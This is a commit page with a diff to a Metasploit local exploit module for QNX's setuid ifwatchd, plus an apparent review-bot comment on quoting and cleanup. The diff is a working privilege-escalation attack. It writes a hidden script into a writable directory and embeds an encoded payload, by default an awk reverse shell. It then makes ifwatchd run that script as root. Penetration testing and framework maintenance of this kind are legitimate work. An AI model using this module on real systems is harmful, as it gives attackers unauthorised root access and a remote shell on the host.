Land #9745, Update QNX iwatchd to use newer APIs

GSoC/Meterpreter_Web_Console
Brent Cook 2018-10-06 05:06:42 -04:00
commit 3d507250b0
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
1 changed files with 16 additions and 19 deletions


@ -6,6 +6,7 @@
class MetasploitModule < Msf::Exploit::Local class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Post::Linux::Priv
include Msf::Post::File include Msf::Post::File
include Msf::Exploit::FileDropper include Msf::Exploit::FileDropper
@ -61,15 +62,19 @@ class MetasploitModule < Msf::Exploit::Local
'PAYLOAD' => 'cmd/unix/reverse_awk' 'PAYLOAD' => 'cmd/unix/reverse_awk'
} }
)) ))
register_options([ register_advanced_options [
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]) ]
end end
def ifwatchd_path def ifwatchd_path
'/sbin/ifwatchd' '/sbin/ifwatchd'
end end
def base_dir
datastore['WritableDir']
end
def check def check
unless setuid? ifwatchd_path unless setuid? ifwatchd_path
vprint_error "#{ifwatchd_path} is not setuid" vprint_error "#{ifwatchd_path} is not setuid"
@ -80,25 +85,20 @@ class MetasploitModule < Msf::Exploit::Local
CheckCode::Detected CheckCode::Detected
end end
def base_dir
datastore['WritableDir']
end
def is_root?
id = cmd_exec 'id'
(id.include?('uid=0') && id.include?('root'))
end
def exploit def exploit
unless check == CheckCode::Detected
fail_with Failure::NotVulnerable, 'Target not vulnerable'
end
if is_root? if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges' fail_with Failure::BadConfig, 'Session already has root privileges'
end end
unless check == CheckCode::Detected unless writable? base_dir
fail_with Failure::NotVulnerable, 'Target is not vulnerable' fail_with Failure::BadConfig, "#{base_dir} is not writable"
end end
script_path = "#{base_dir}/.#{rand_text_alphanumeric rand(10..15)}" script_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"
print_status 'Writing interface arrival event script...' print_status 'Writing interface arrival event script...'
cmd_exec "echo '#!/bin/sh' > #{script_path}" cmd_exec "echo '#!/bin/sh' > #{script_path}"
@ -107,15 +107,12 @@ class MetasploitModule < Msf::Exploit::Local
exp = payload.encoded.gsub('"', '\"').gsub('$', '\$') exp = payload.encoded.gsub('"', '\"').gsub('$', '\$')
cmd_exec "echo \"#{exp}\" >> #{script_path}" cmd_exec "echo \"#{exp}\" >> #{script_path}"
cmd_exec "echo 'kill -9 $IFWPID' >> #{script_path}" cmd_exec "echo 'kill -9 $IFWPID' >> #{script_path}"
register_file_for_cleanup script_path
cmd_exec "chmod +x '#{script_path}'" cmd_exec "chmod +x '#{script_path}'"
print_status "Executing #{ifwatchd_path}..." print_status "Executing #{ifwatchd_path}..."
interface = 'lo0' interface = 'lo0'
cmd_exec "#{ifwatchd_path} -A '#{script_path}' -v #{interface} >/dev/null & echo " cmd_exec "#{ifwatchd_path} -A '#{script_path}' -v #{interface} >/dev/null & echo "
Rex.sleep 5
cmd_exec "rm -f '#{script_path}'"
end end
end end
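Review bot: `script_path` is interpolated unquoted into the three `echo ... > #{script_path}` / `>> #{script_path}` redirections in `exploit`, while the `chmod` and `ifwatchd` lines in the same method wrap it in single quotes. Because `base_dir` comes from the operator-set `WritableDir` option, a value containing a space or a shell metacharacter would make those writes land on a different path than the one that is later made executable and registered for cleanup, leaving stray files on the host under test. Quote it consistently, e.g. `cmd_exec "echo '#!/bin/sh' > '#{script_path}'"`. Separately, with the explicit `rm -f` removed, deletion now rests entirely on `register_file_for_cleanup`, which as far as I can tell only runs once a session is established, so a run that yields no session may leave the script in `WritableDir`. A short comment saying so above that call would help whoever has to clean up after a failed run.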